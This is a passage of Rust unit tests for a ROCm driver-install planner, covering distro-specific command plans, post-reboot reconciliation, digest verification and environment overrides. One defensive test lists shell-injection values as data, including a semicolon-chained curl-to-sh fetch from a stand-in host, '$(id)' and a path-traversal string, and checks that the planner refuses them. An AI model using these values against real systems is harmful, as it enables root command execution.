.expect_err("a post-driver gather failure must still fail the install"); + let saved = read_driver_install_state(&paths)?.expect("state should remain readable"); + + assert!(error.to_string().contains("post-driver gather failed")); + assert!(saved.executed_at_unix_ms.is_some()); + assert!(saved.post_driver.is_none()); + let _ = fs::remove_dir_all(root); + Ok(()) + } + + #[test] + fn driver_reconcile_without_state_gives_non_privileged_guidance() -> Result<()> { + let (root, paths) = test_paths("driver-reconcile-empty"); + + let rendered = reconcile_driver_install(&paths)?; + + assert!(rendered.contains("driver install reconciliation")); + assert!(rendered.contains("approval: not required")); + assert!(rendered.contains("privileged_commands: ")); + assert!(rendered.contains("no prior driver execution state found")); + assert!(rendered.contains("rocm install driver --dkms")); + assert!(!driver_install_state_path(&paths).exists()); + let _ = fs::remove_dir_all(root); + Ok(()) + } + + #[test] + fn driver_reconcile_updates_state_after_reboot() -> Result<()> { + let (root, paths) = test_paths("driver-reconcile-state"); + let pre_driver = rocm_core::DriverSummary { + policy: "linux_official_amd_dkms_wrapper".to_owned(), + status: "not_detected".to_owned(), + detail: None, + }; + let current_driver = rocm_core::DriverSummary { + policy: "linux_official_amd_dkms_wrapper".to_owned(), + status: "amdgpu_available".to_owned(), + detail: Some("/dev/kfd is present".to_owned()), + }; + let mut state = DriverInstallState { + approved_at_unix_ms: 1, + executed_at_unix_ms: Some(2), + pre_driver, + post_driver: None, + boot_id_at_execution: Some("old-boot".to_owned()), + reboot_required: true, + reboot_observed: false, + commands: vec!["sudo apt-get install -y amdgpu-dkms".to_owned()], + reconciled_at_unix_ms: None, + reconciliation: None, + }; + let checks = vec![ + DriverPassiveCheck { + name: "/dev/kfd".to_owned(), + status: "present".to_owned(), + detail: "KFD device node".to_owned(), + }, + DriverPassiveCheck { + name: "/dev/dri/renderD*".to_owned(), + status: "missing".to_owned(), + detail: "DRM render node".to_owned(), + }, + ]; + + let rendered = reconcile_driver_install_state( + &paths, + &mut state, + current_driver, + Some("new-boot".to_owned()), + checks, + )?; + let saved = read_driver_install_state(&paths)?.expect("state should be saved"); + + assert!(rendered.contains("reboot_observed: true")); + assert!(rendered.contains("approval: not required")); + assert!(rendered.contains("privileged_commands: ")); + assert!(rendered.contains("driver_status: amdgpu_available")); + assert!(rendered.contains("passive_check_summary: total=2 present=1 missing=1")); + assert!(rendered.contains("/dev/dri/renderD*: missing")); + assert!(rendered.contains("missing passive checks")); + assert!(saved.reboot_observed); + assert!(saved.reconciled_at_unix_ms.is_some()); + assert_eq!( + saved + .reconciliation + .as_ref() + .map(|value| value.driver.status.as_str()), + Some("amdgpu_available") + ); + let reconciliation = saved.reconciliation.as_ref().expect("reconciliation saved"); + assert_eq!(reconciliation.check_summary.total, 2); + assert_eq!(reconciliation.check_summary.present, 1); + assert_eq!(reconciliation.check_summary.missing, 1); + let _ = fs::remove_dir_all(root); + Ok(()) + } + + #[test] + fn driver_reconcile_preserves_explicit_reboot_policy() -> Result<()> { + for reboot_required in [false, true] { + let (root, paths) = test_paths(if reboot_required { + "driver-reconcile-reboot-true" + } else { + "driver-reconcile-reboot-false" + }); + let driver = rocm_core::DriverSummary { + policy: "driver-policy".to_owned(), + status: "available".to_owned(), + detail: None, + }; + let mut state = DriverInstallState { + approved_at_unix_ms: 1, + executed_at_unix_ms: Some(2), + pre_driver: driver.clone(), + post_driver: None, + boot_id_at_execution: Some("same-boot".to_owned()), + reboot_required, + reboot_observed: false, + commands: vec!["execute".to_owned()], + reconciled_at_unix_ms: None, + reconciliation: None, + }; + + reconcile_driver_install_state( + &paths, + &mut state, + driver, + Some("same-boot".to_owned()), + Vec::new(), + )?; + let saved = read_driver_install_state(&paths)?.expect("state should be saved"); + + assert_eq!(state.reboot_required, reboot_required); + assert_eq!(saved.reboot_required, reboot_required); + let _ = fs::remove_dir_all(root); + } + Ok(()) + } + + #[test] + fn driver_passive_check_summary_counts_non_present_as_missing() { + let summary = summarize_driver_passive_checks(&[ + DriverPassiveCheck { + name: "/dev/kfd".to_owned(), + status: "present".to_owned(), + detail: "KFD".to_owned(), + }, + DriverPassiveCheck { + name: "/dev/dri/renderD*".to_owned(), + status: "missing".to_owned(), + detail: "render".to_owned(), + }, + DriverPassiveCheck { + name: "dkms".to_owned(), + status: "error".to_owned(), + detail: "dkms status failed".to_owned(), + }, + ]); + + assert_eq!(summary.total, 3); + assert_eq!(summary.present, 1); + assert_eq!(summary.missing, 2); + } + + #[test] + fn driver_plan_default_linux_preflight_has_no_execution_commands() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + let os_release = r#" +ID=ubuntu +VERSION_ID="24.04" +VERSION_CODENAME=noble +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + false, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, false); + + assert!(plan.supported); + assert!(!plan.mutating); + assert!(plan.commands.is_empty()); + assert!(rendered.contains("approval: not required")); + assert!(rendered.contains("execution_commands: ")); + assert!(!rendered.contains("sudo apt-get")); + assert!(rendered.contains("add --dkms")); + } + + #[test] + fn resolve_shell_default_template_uses_default_when_env_unset() { + let _env = ScopedTestEnv::new(); + // A made-up variable name that nothing else sets, cleared under the lock, + // isolates the default path. + assert_eq!( + resolve_shell_default_template("${ROCM_CLI_TEST_UNSET_REPO_VERSION:-7.2.4}"), + "7.2.4" + ); + } + + #[test] + fn resolve_shell_default_template_prefers_env_value_when_set() { + let mut env = ScopedTestEnv::new(); + let var = "ROCM_CLI_TEST_REPO_VERSION_OVERRIDE"; + env.set(var, "9.9.9"); + assert_eq!( + resolve_shell_default_template(&format!("${{{var}:-7.2.4}}")), + "9.9.9" + ); + } + + #[test] + fn resolve_shell_default_template_treats_empty_env_as_unset() { + let mut env = ScopedTestEnv::new(); + let var = "ROCM_CLI_TEST_REPO_VERSION_EMPTY"; + env.set(var, ""); + assert_eq!( + resolve_shell_default_template(&format!("${{{var}:-7.2.4}}")), + "7.2.4" + ); + } + + #[test] + fn resolve_shell_default_template_passes_through_non_template() { + assert_eq!(resolve_shell_default_template("7.2.4"), "7.2.4"); + } + + #[test] + fn resolve_shell_default_template_leaves_bare_var_untouched() { + let _env = ScopedTestEnv::new(); + // No `:-default`, so there is nothing to resolve to; the input must pass + // through unchanged rather than being partially rewritten. + assert_eq!( + resolve_shell_default_template("${ROCM_CLI_TEST_UNSET_REPO_VERSION}"), + "${ROCM_CLI_TEST_UNSET_REPO_VERSION}" + ); + } + + #[test] + fn resolve_shell_default_template_leaves_nested_default_untouched() { + let _env = ScopedTestEnv::new(); + // A nested default is beyond the flat matcher; returning the literal + // input keeps a `${B:-x}` fragment from leaking as a "resolved" value. + assert_eq!( + resolve_shell_default_template("${ROCM_CLI_TEST_UNSET_A:-${ROCM_CLI_TEST_UNSET_B:-x}}"), + "${ROCM_CLI_TEST_UNSET_A:-${ROCM_CLI_TEST_UNSET_B:-x}}" + ); + } + + #[test] + fn driver_plan_dry_run_repo_version_line_is_resolved() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + // Regression for the dry-run output leaking the raw shell placeholder on + // the `repo_version:` line instead of the effective version. + let os_release = r#" +ID=rhel +VERSION_ID="9.7" +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, true); + + assert!(rendered.contains("repo_version: 7.2.4")); + assert!(!rendered.contains("repo_version: ${ROCM_CLI_AMDGPU_VERSION:-7.2.4}")); + } + + #[test] + fn driver_plan_debian_12_omits_linux_modules_extra() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + let os_release = r#" +ID=debian +VERSION_ID="12" +VERSION_CODENAME=bookworm +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, true); + + assert!(plan.supported); + assert!(rendered.contains("approval: not required")); + assert!(rendered.contains("linux-headers-$(uname -r)")); + assert!(!rendered.contains("linux-modules-extra-$(uname -r)")); + assert!(rendered.contains("amdgpu-dkms")); + assert!(rendered.contains("dry run only")); + } + + #[test] + fn driver_plan_rhel_97_uses_documented_dnf_commands() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + let os_release = r#" +ID=rhel +VERSION_ID="9.7" +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, false); + + assert!(plan.supported); + assert!(plan.mutating); + assert_eq!(plan.policy, "linux_official_amd_dkms_wrapper"); + assert!(rendered.contains("`dnf` package manager is available")); + assert!(rendered.contains("kernel-headers-$(uname -r)")); + assert!(rendered.contains("kernel-devel-$(uname -r)")); + assert!(rendered.contains("kernel-devel-matched-$(uname -r)")); + assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/rhel/9.7/")); + assert!(rendered.contains("amdgpu-install-7.2.4.70204-1.el9.noarch.rpm")); + assert!(rendered.contains("Execute: sudo dnf install -y amdgpu-dkms")); + assert!(rendered.contains("approval: required")); + } + + #[test] + fn driver_plan_oracle_linux_101_uses_el_10_uek_flow() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + let os_release = r#" +ID=ol +VERSION_ID="10.1" +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, true); + + assert!(plan.supported); + assert!(rendered.contains("approval: not required")); + assert!(rendered.contains("kernel-uek-devel-$(uname -r)")); + assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/el/10/")); + assert!(rendered.contains("amdgpu-install-7.2.4.70204-1.el10.noarch.rpm")); + assert!(rendered.contains("dry run only")); + } + + #[test] + fn driver_plan_rocky_97_uses_el_dnf_flow() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + let os_release = r#" +ID=rocky +VERSION_ID="9.7" +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, false); + + assert!(plan.supported); + assert!( + rendered + .contains("sudo dnf install -y kernel-headers kernel-devel kernel-devel-matched") + ); + assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/el/9.7/")); + assert!(rendered.contains("Execute: sudo dnf install -y amdgpu-dkms")); + } + + #[test] + fn driver_plan_rocky_94_uses_el_dnf_flow() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + // Rocky 9.x point releases must resolve like RHEL 9.x, not just 9.7. + let os_release = r#" +ID=rocky +VERSION_ID="9.4" +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, false); + + assert!(plan.supported); + assert!(plan.mutating); + assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/el/9.4/")); + assert!(rendered.contains("amdgpu-install-7.2.4.70204-1.el9.noarch.rpm")); + assert!(rendered.contains("Execute: sudo dnf install -y amdgpu-dkms")); + } + + #[test] + fn driver_plan_rocky_8_and_10_remain_unsupported() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + // AMD documents Rocky Linux 9 only; keep the driver matrix scoped to 9.x. + for version in ["8.10", "10.0"] { + let os_release = format!("\nID=rocky\nVERSION_ID=\"{version}\"\n"); + let plan = build_driver_install_plan( + &test_examine("linux", false), + &os_release, + true, + PrivilegeEscalation::Sudo, + ); + assert!(!plan.supported, "rocky {version} should be unsupported"); + assert!(!plan.mutating, "rocky {version} must not mutate"); + assert!( + plan.commands.is_empty(), + "rocky {version} must emit no commands" + ); + } + } + + #[test] + fn driver_plan_debian_uses_intended_ubuntu_suite() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + // AMD's documented Debian install deliberately serves Debian from the + // Ubuntu-suite graphics tree (Debian 12 -> jammy). Lock that in and + // ensure the plan explains the mapping is intentional. + let os_release = r#" +ID=debian +VERSION_ID="12" +VERSION_CODENAME=bookworm +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, true); + + assert!(plan.supported); + assert_eq!(plan.codename, "jammy"); + assert!(rendered.contains("https://repo.radeon.com/graphics/7.2.4/ubuntu jammy main")); + assert!( + plan.reason + .contains("intentionally uses AMD's Ubuntu-suite repository") + ); + } + + #[test] + fn driver_plan_sles_157_uses_documented_zypper_commands() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + let os_release = r#" +ID=sles +VERSION_ID="15.7" +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, false); + + assert!(plan.supported); + assert!(rendered.contains("`zypper` package manager is available")); + assert!(rendered.contains("SUSEConnect")); + assert!(rendered.contains("sle-module-desktop-applications/15.7/x86_64")); + assert!(rendered.contains("sudo zypper install -y kernel-default-devel")); + assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/sle/15.7/")); + assert!(rendered.contains("sudo zypper --no-gpg-checks install -y")); + assert!(rendered.contains("Execute: sudo zypper install -y amdgpu-dkms")); + assert!(rendered.contains("approval: required")); + } + + #[test] + fn driver_plan_unsupported_linux_is_non_mutating() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + let os_release = r#" +ID=fedora +VERSION_ID="41" +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, false); + + assert!(!plan.supported); + assert!(!plan.mutating); + assert!(rendered.contains("unsupported_linux_dkms_plan")); + assert!(rendered.contains("approval: not required")); + assert!(rendered.contains("no driver commands will be executed")); + assert!(!rendered.contains("sudo dnf install -y amdgpu-dkms")); + } + + #[test] + fn windows_install_driver_is_validate_only() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + let plan = build_driver_install_plan( + &test_examine("windows", false), + "", + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, true); + + assert!(!plan.supported); + assert!(!plan.mutating); + assert_eq!(plan.policy, "windows_validate_only"); + assert!(rendered.contains("approval: not required")); + assert!(rendered.contains("execution_commands: ")); + assert!(rendered.contains("post_reboot_checks:")); + assert!(rendered.contains("use `rocm examine`")); + assert!(rendered.contains("rocm examine")); + assert!(plan.commands.is_empty()); + } + + #[test] + fn wsl_install_driver_installs_rocdxg_without_dkms() { + // `dkms: true` is passed deliberately: WSL2 has no kernel module to + // build, so the flag must not pull in the bare-metal path. + // + // `build_driver_install_plan` resolves `${ROCM_CLI_AMDGPU_VERSION:-...}` + // from process env before it reaches the WSL branch, and the WSL branch + // then reads the three ROCDXG vars — an exported + // `ROCM_CLI_ROCDXG_VERSION` would steer this plan into a refusal and + // fail the `plan.supported` assertion below. So this reader takes the + // guard that clears both sets. + let _env = scoped_rocdxg_env(); + let plan = build_driver_install_plan( + &test_examine("linux", true), + "", + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, false); + + assert!(plan.supported); + assert!(plan.mutating); + assert_eq!(plan.policy, "wsl_rocdxg"); + assert!(!rendered.contains("amdgpu-dkms")); + // The whole point of the bug: the plan must be runnable, and must not + // send the user to a file that only exists in a git checkout. + assert!(!rendered.contains("execution_commands: ")); + assert!(!rendered.contains("scripts/")); + assert!(rendered.contains("approval: required")); + } + + #[test] + fn wsl_rocdxg_plan_installs_the_library_and_publishes_it() { + // Asserts on the default plan, so it has to take the same guard as the + // mutating tests in this binary: a concurrent test exporting + // `ROCM_CLI_ROCDXG_VERSION` would otherwise steer this one's plan. + let _env = scoped_rocdxg_env(); + let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + let commands = plan.execution_commands().join("\n"); + + // Fetches the release artifact, installs it, and makes the linker see + // it. Any one of these missing leaves `wsl_rocdxg_ready` unreachable. + assert!(commands.contains("https://github.com/ROCm/librocdxg/releases/download/")); + assert!(commands.contains("rocdxg-roct_")); + assert!(commands.contains("sudo apt-get install -y '/tmp/rocdxg-roct_")); + assert!(commands.contains("sudo ldconfig")); + + // And in that order. `ldconfig` refreshes the cache from what is on + // disk now, so running it before `apt-get install` has unpacked + // `librocdxg.so` scans a directory that does not contain it yet and + // publishes nothing — leaving the plan reporting success while the + // `ldconfig -p` verification below is the only thing that would notice. + // Both steps are still present under that swap, so every `contains` + // assertion in this file stays green; only a position comparison + // catches it. + let steps = plan.execution_commands(); + let install = steps + .iter() + .position(|c| c.contains("apt-get install -y '/tmp/")) + .expect("plan installs the package"); + let publish = steps + .iter() + .position(|c| c.trim_end().ends_with("ldconfig")) + .expect("plan publishes the library"); + assert!( + install < publish, + "ldconfig must run after the package is installed:\n{}", + steps.join("\n") + ); + + // Verification asserts the two things `examine` keys `wsl_rocdxg_ready` + // on, so a silently partial install cannot report success. + let verify = plan + .commands + .iter() + .filter(|c| c.phase == DriverCommandPhase::Verify) + .map(|c| c.command.clone()) + .collect::>() + .join("\n"); + assert!(verify.contains("/opt/rocm/lib/librocdxg.so")); + assert!(verify.contains("ldconfig -p")); + } + + #[test] + fn wsl_rocdxg_plan_guards_the_gpu_plumbing_before_any_mutating_command() { + // /dev/dxg and dxcore come from the Windows side. If they are missing, + // installing the bridge library accomplishes nothing, so the plan must + // stop rather than report a successful install of something inert. + let _env = scoped_rocdxg_env(); + let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + let prepare = plan + .commands + .iter() + .filter(|c| c.phase == DriverCommandPhase::Prepare) + .map(|c| c.command.clone()) + .collect::>(); + let joined = prepare.join("\n"); + assert!(joined.contains("/dev/dxg")); + assert!(joined.contains("/usr/lib/wsl/lib/libdxcore.so")); + // Named explicitly, rather than surfacing as `sudo: command not found` + // from whichever privileged step happened to run first. + assert!(joined.contains("command -v sudo")); + // Both guards run before anything is fetched or installed. + let first_mutation = plan + .execution_commands() + .iter() + .position(|c| c.contains("apt-get") || c.contains("curl")) + .expect("plan installs something"); + let last_guard = plan + .execution_commands() + .iter() + .rposition(|c| c.contains("is missing")) + .expect("plan guards the plumbing"); + assert!( + last_guard < first_mutation, + "plumbing guards must precede the first mutating command" + ); + } + + /// Clear every input that steers the ROCDXG plan, so a value exported in + /// the developer's or runner's shell cannot decide the outcome of a test + /// that is asserting on the default. + /// + /// Builds on [`ScopedTestEnv::with_amd_overrides_cleared`] rather than + /// `new` because a WSL plan reached through `build_driver_install_plan` + /// resolves the bare-metal AMDGPU overrides before it dispatches to the WSL + /// branch: a caller needing one of these two guards needs both, and one + /// helper spares every test from picking the wrong half. + fn scoped_rocdxg_env() -> ScopedTestEnv { + let mut env = ScopedTestEnv::with_amd_overrides_cleared(); + env.clear("ROCM_CLI_ROCDXG_VERSION"); + env.clear(ROCDXG_SHA256_ENV); + env.clear(ROCDXG_ALLOW_UNVERIFIED_ENV); + env + } + + #[test] + fn wsl_rocdxg_download_is_verified_against_a_pinned_digest_by_default() { + // The package is installed with `apt-get install`, which runs its + // maintainer scripts as root. With no digest, TLS to the release host + // is the only thing authenticating that download — weaker than the + // bare-metal path in this same file, which installs from a + // `signed-by=` pinned repository. So the default plan must verify. + let _env = scoped_rocdxg_env(); + let commands = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo).execution_commands(); + let joined = commands.join("\n"); + + let pinned = ROCDXG_PINNED_DIGESTS + .iter() + .find_map(|(version, digest)| (*version == "1.2.2").then_some(*digest)) + .expect("the default version is pinned"); + assert!(joined.contains(pinned), "{joined}"); + assert!(joined.contains("sha256sum -c -"), "{joined}"); + + // Not a conditional: an unset variable must not be able to turn + // verification off, which is what the previous `if [ -n ... ]` form + // did. + assert!( + !joined.contains("skipping checksum verification"), + "{joined}" + ); + assert!(!joined.contains(ROCDXG_SHA256_ENV), "{joined}"); + + // Ordering is the whole point — a digest checked after the install has + // already run is decoration. + let check = commands + .iter() + .position(|c| c.contains("sha256sum -c -")) + .expect("plan verifies the download"); + let install = commands + .iter() + .position(|c| c.contains("apt-get install -y '/tmp/")) + .expect("plan installs the package"); + assert!(check < install, "digest must be checked before install"); + } + + #[test] + fn wsl_rocdxg_refuses_a_version_whose_digest_is_unknown() { + // An unpinned version is the case where silently falling back to "no + // verification" would be most dangerous, because it is reachable from + // a single environment variable. + let mut env = scoped_rocdxg_env(); + env.set("ROCM_CLI_ROCDXG_VERSION", "9.9.9"); + + let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + assert!(!plan.supported); + assert!(!plan.mutating); + assert!(plan.commands.is_empty(), "a refusal must run nothing"); + assert!(plan.reason.contains(ROCDXG_SHA256_ENV), "{}", plan.reason); + assert!( + plan.reason.contains(ROCDXG_ALLOW_UNVERIFIED_ENV), + "{}", + plan.reason + ); + } + + #[test] + fn wsl_rocdxg_accepts_a_supplied_digest_for_an_unpinned_version() { + // The escape hatch for a release newer than this build: supply the + // digest rather than disabling verification. + let mut env = scoped_rocdxg_env(); + env.set("ROCM_CLI_ROCDXG_VERSION", "9.9.9"); + let supplied = "a".repeat(64); + env.set(ROCDXG_SHA256_ENV, &supplied); + + let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + assert!(plan.supported); + let joined = plan.execution_commands().join("\n"); + assert!(joined.contains(&supplied), "{joined}"); + assert!(joined.contains("sha256sum -c -"), "{joined}"); + } + + #[test] + fn wsl_rocdxg_rejects_a_malformed_supplied_digest() { + // A truncated or mistyped digest must not silently fall back to the + // pinned one, which would verify a different artifact than the user + // asked for and report success. + let mut env = scoped_rocdxg_env(); + env.set(ROCDXG_SHA256_ENV, "not-a-digest"); + + let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + assert!(!plan.supported); + assert!(plan.commands.is_empty()); + assert!(plan.reason.contains(ROCDXG_SHA256_ENV), "{}", plan.reason); + } + + #[test] + fn wsl_rocdxg_unverified_install_takes_an_explicit_opt_out() { + // Installing unverified stays possible — it just has to be asked for, + // and the plan the user approves has to say so. + let mut env = scoped_rocdxg_env(); + env.set("ROCM_CLI_ROCDXG_VERSION", "9.9.9"); + env.set(ROCDXG_ALLOW_UNVERIFIED_ENV, "1"); + + let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + assert!(plan.supported); + let joined = plan.execution_commands().join("\n"); + assert!(!joined.contains("sha256sum -c -"), "{joined}"); + assert!(joined.contains("without verifying it"), "{joined}"); + } + + #[test] + fn wsl_rocdxg_opt_out_reads_negative_values_as_off() { + // The opt-out is a boolean, not a presence check. Reading "set to + // anything" as yes would turn digest verification off for a package + // installed as root on the strength of `=0` — the one value a reader + // writes when they mean the opposite. + for negative in ["0", "false", "no", "off", ""] { + let mut env = scoped_rocdxg_env(); + env.set("ROCM_CLI_ROCDXG_VERSION", "9.9.9"); + env.set(ROCDXG_ALLOW_UNVERIFIED_ENV, negative); + + let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + assert!( + !plan.supported, + "{ROCDXG_ALLOW_UNVERIFIED_ENV}={negative:?} disabled verification" + ); + assert!( + plan.commands.is_empty(), + "{ROCDXG_ALLOW_UNVERIFIED_ENV}={negative:?} built an unverified install" + ); + } + + // The affirmative spellings still work, so this is a narrowing of what + // counts as yes rather than a removal of the escape hatch. + for affirmative in ["1", "true", "yes", "on"] { + let mut env = scoped_rocdxg_env(); + env.set("ROCM_CLI_ROCDXG_VERSION", "9.9.9"); + env.set(ROCDXG_ALLOW_UNVERIFIED_ENV, affirmative); + + let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + assert!( + plan.supported, + "{ROCDXG_ALLOW_UNVERIFIED_ENV}={affirmative:?} was not honoured" + ); + } + } + + #[test] + fn wsl_rocdxg_refuses_a_version_that_could_escape_the_shell() { + // `ROCM_CLI_ROCDXG_VERSION` is interpolated into commands executed via + // `sh -c` after `apt-get update` has primed the sudo credential cache, + // so a `;` in it would start a second, attacker-chosen command running + // as root. The plan must refuse rather than quote its way out. + for hostile in [ + "1.2.0; curl http://example.invalid/x | sh", + "1.2.0 && id", + "$(id)", + "1.2.0`id`", + "../../etc/passwd", + "1.2.0\nid", + "1.2.0 ", + ] { + let mut env = scoped_rocdxg_env(); + env.set("ROCM_CLI_ROCDXG_VERSION", hostile); + // An opt-out must not buy past the version check either. + env.set(ROCDXG_ALLOW_UNVERIFIED_ENV, "1"); + + let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + assert!(!plan.supported, "accepted hostile version {hostile:?}"); + assert!( + plan.commands.is_empty(), + "built commands from hostile version {hostile:?}" + ); + // The refused value is echoed back in the plan a human reads, so it + // must not be able to forge lines there. Every line the renderer + // emits after the header is indented, so an unindented one came + // from the value. + let rendered = render_driver_install_plan(&plan, false, false); + for line in rendered.lines().skip(1) { + assert!( + line.starts_with(" "), + "hostile version {hostile:?} forged plan line {line:?} in:\n{rendered}" + ); + } + } + } + + #[test] + fn wsl_rocdxg_plan_drops_sudo_when_already_root() { + // Same reason the bare-metal plans take an escalation: containers and + // minimal cloud images run as uid 0 with no `sudo` binary, where an + // unconditional prefix kills every command before any driver work. + let _env = scoped_rocdxg_env(); + let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::AlreadyRoot); + let joined = plan.execution_commands().join("\n"); + assert!(!joined.contains("sudo "), "{joined}"); + assert!(joined.contains("apt-get install -y '/tmp/"), "{joined}"); + // And it must not demand a binary it no longer uses. + assert!(!joined.contains("command -v sudo"), "{joined}"); + assert!( + !plan + .preflight_checks + .iter() + .any(|check| check.contains("`sudo` command is available")), + "{:?}", + plan.preflight_checks + ); + } + + /// Runs the digest step the plan actually generates, rather than asserting + /// that it contains some substrings. + /// + /// The step this exercises is the trust anchor for a root install, and the + /// executable self-test that used to cover it was deleted along with + /// `scripts/wsl_setup_rocdxg.sh`. Substring assertions would let a quoting, + /// field-order or newline regression in the `printf | sha256sum -c -` + /// fragment ship green, so the generated command is pinned whole with + /// `assert_eq!` and then executed — with only the two values it embeds + /// redirected at a test payload, so the quoting, spacing and field order + /// under test are production's rather than a replica's. + /// + /// Field order in particular is invisible to a `starts_with`/`ends_with` + /// pair: `sha256sum -c -` reads `DIGEST FILENAME`, so emitting the path + /// first breaks every real WSL install while still starting with + /// `printf '%s %s\n' '` and ending with `' | sha256sum -c -`. + #[cfg(unix)] + #[test] + fn wsl_rocdxg_generated_digest_step_accepts_only_the_matching_file() { + use std::process::Command; + + let _env = scoped_rocdxg_env(); + let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + let version = plan.repo_version.clone(); + let pinned = ROCDXG_PINNED_DIGESTS + .iter() + .find_map(|(pinned_version, digest)| { + (*pinned_version == version.as_str()).then_some(*digest) + }) + .expect("the default version is pinned"); + let deb_path = format!("/tmp/rocdxg-roct_{version}_amd64.deb"); + let generated = plan + .execution_commands() + .into_iter() + .find(|c| c.contains("sha256sum -c -")) + .expect("plan verifies the download"); + + // Whole-string, not `contains`: the digest has to come first and the + // two fields have to be separated by exactly the two spaces + // `sha256sum -c -` expects. + assert_eq!( + generated, + format!("printf '%s %s\\n' '{pinned}' '{deb_path}' | sha256sum -c -") + ); + + let (root, _paths) = test_paths("wsl-rocdxg-digest"); + fs::create_dir_all(&root).expect("test root"); + let payload = root.join(format!("rocdxg-roct_{version}_amd64.deb")); + fs::write(&payload, b"pretend this is a .deb\n").expect("write payload"); + + let digest_of = |path: &Path| -> String { + let out = Command::new("sha256sum") + .arg(path) + .output() + .expect("sha256sum runs"); + assert!(out.status.success()); + String::from_utf8(out.stdout) + .expect("utf8") + .split_whitespace() + .next() + .expect("digest field") + .to_owned() + }; + let good = digest_of(&payload); + + // The command under test is the generated one; the only edits are the + // digest being checked and the path being checked, so a regression in + // how the fragment is built reaches `sh` here instead of being masked + // by a replica built to the test's own idea of the right shape. + let step = |digest: &str| -> bool { + let command = generated + .replace(pinned, digest) + .replace(&deb_path, &payload.display().to_string()); + Command::new("sh") + .arg("-c") + .arg(&command) + .output() + .expect("sh runs") + .status + .success() + }; + + assert!(step(&good), "the matching digest must pass"); + assert!( + !step(&"0".repeat(64)), + "a mismatched digest must fail the step" + ); + assert!(!step("deadbeef"), "a malformed digest must fail the step"); + assert!(!step(""), "an empty digest must fail the step"); + + let _ = fs::remove_dir_all(&root); + } + + #[test] + fn wsl_rocdxg_install_does_not_ask_for_a_reboot() { + // ROCDXG is userspace: `ldconfig` publishes it in this boot. The + // bare-metal DKMS path is the one that needs a reboot. + let _env = scoped_rocdxg_env(); + let wsl = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + assert!(!wsl.reboot_required); + let rendered = render_driver_install_plan(&wsl, false, false); + // Anchor on the install step first: a refusal plan also reports + // `reboot_required: false`, renders `post_install_checks:` from its + // non-empty `checks`, and contains no `post_reboot` — so the three + // assertions below hold against a plan that installs nothing at all. + // Only a real install plan carries this command. + assert!( + rendered.contains("apt-get install -y '/tmp/"), + "expected a real install plan, got:\n{rendered}" + ); + assert!(rendered.contains("post_install_checks:")); + assert!(!rendered.contains("post_reboot")); + + let bare_metal = build_driver_install_plan( + &test_examine("linux", false), + "ID=ubuntu\nVERSION_ID=\"24.04\"\nVERSION_CODENAME=noble\n", + true, + PrivilegeEscalation::Sudo, + ); + assert!(bare_metal.reboot_required); + assert!(render_driver_install_plan(&bare_metal, false, false).contains("post_reboot")); + } + + #[test] + fn wsl_rocdxg_version_is_overridable_and_reaches_every_reference() { + // One resolved value drives the archive name, the release tag and the + // download path, so an override cannot leave a URL pointing at the + // default. The value is resolved at plan-build time rather than left as + // a `${VAR:-default}` template, so the plan the user reviews names the + // build the install will actually 